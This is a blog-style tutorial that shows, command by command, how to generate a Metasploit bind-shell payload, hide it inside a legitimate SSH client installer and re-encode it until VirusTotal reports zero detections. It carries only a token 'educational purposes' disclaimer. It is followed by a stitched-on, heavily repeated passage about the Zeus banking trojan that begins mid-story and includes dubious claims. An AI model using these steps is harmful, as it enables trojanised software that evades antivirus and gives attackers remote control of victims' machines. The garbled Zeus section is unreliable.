How To Bypass Antivirus Detection-Making Exe FUD

Notice !!!

This Post is only for Educational Purposes, the author of this post is not responsible for any misuse.

Requirements:

A Backtrack machine , real or virtual. I used Backtrack 5 r3, but other versions of Backtrack are working OK too !!! 

Purpose:

Antivirus protects machines from malware but not all of it .There are ways to pack malware to make it harder to detect. Well use Metasploit to render malware completely invisible to antivirus. 

Creating a Listener:

This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won't spread, but it is detected by antivirus engines. In Backtrack in a Terminal windows execute these commands:  

cd

msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe

ls -l listen.exe

You should see the listen.exe file as shown below: 

Analyzing the Listener with VirusTotal

Go to https://www.virustotal.com/en/

Click the "Choose File" button. Navigate to /root and double-click the listen.exe"listen.exe" appears in the "Choose File" box, as shown below:

On the Virustotal web page , Click the "scan it" button !!!

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Encoding the Listener 

This process will encode the listener, & insert it into an innocent SSH file.

In BackTrack, in a Terminal window, execute these commands:

wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exemsfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1ls -l evil*

You should see the evil-ssh.exe file as shown below :

Scan with virusTOTAL

Go to: https://www.virustotal.com/

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it, as shown below. You may see different numbers.

 

Encode the Listener Again This process will encode the listener with several different encodings.

In BackTrack, in a Terminal window, execute these commands:

msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1msfencode -i /root/listen2.exe -t raw -o

/root/listen3.exe -e x86/jmp_call_additive -c 1

msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1

msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1ls -l listen*

You should see several files as shown below : 

Analyzing Again

The analysis shows that fewer of the antivirus engines detect the file now 0 out of 42 When I did it as shown below. you may see different numbers. 

How Your Bank Accounts Can Be Stolen With Zeus Virus?

Zeus is a Trojan horse that steals banking information by Man-in-the-browser keystroke logging and Form Grabbing. Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as the Bank of America, NASA, Monster.com, ABC, Oracle, Play.com, Cisco, Amazon, and BusinesWeek

That fake page could then ask for your security information and some other important data that could be easily sold in the black market.
According to many sources, perhaps it has been confirmed that those pages are being hosted by the Russian Mafia (known as the Russian Business Network as well).
Does Facebook Took Action Against It?
The founder of advocacy group Fans Against Kounterfeit Enterprise (FAKE) said that he was trying to alert Facebook about this issue to take action against it as soon as possible, but unluckily he was not well satisfied with their response.

Those who are using windows should stay much care about this issue. It has been said that Windows devices are much infected with this virus. Hence, Mac OS X or Linux is still safe from this virus.

Some countries like the USA and UK are badly infected, though, India, Russia, Canada and France are also infected with the virus at some moderate  limits. Some other countries like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries are less affected by this virus.
The founder of advocacy group Fans Against Kounterfeit Enterprise (FAKE) said that he was trying to alert Facebook about this issue to take action against it as soon as possible, but unluckily he was not well satisfied with their response.
Those who are using windows should stay much care about this issue. It has been said that Windows devices are much infected with this virus. Hence, Mac OS X or Linux is still safe from this virus.

Some countries like the USA and UK are badly infected, though, India, Russia, Canada and France are also infected with the virus at some moderate  limits. Some other countries like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries are less affected by this virus.
Those who are using windows should stay much care about this issue. It has been said that Windows devices are much infected with this virus. Hence, Mac OS X or Linux is still safe from this virus.
Some countries like the USA and UK are badly infected, though, India, Russia, Canada and France are also infected with the virus at some moderate  limits. Some other countries like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries are less affected by this virus.
Some countries like the USA and UK are badly infected, though, India, Russia, Canada and France are also infected with the virus at some moderate  limits. Some other countries like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries are less affected by this virus.

.

Zeus Virus can propagate through phishing messages that are generated from the account that was already compromised by phishing. That phished account will then start sending messages to your friends containing links to the ads and would ask them to simply checkout the video or product by clicking on such links. This way the virus will go viral.

Readers are requested to stay refrain from clicking such links, because they might end up getting their accounts compromised The virus is very sophisticated, so that it could replace the website of a bank with the mimicked page of its own.

Facebook is aware of it, but it is unlikely that Facebook is going to take any action against it.

Regards: By Anshuman Kak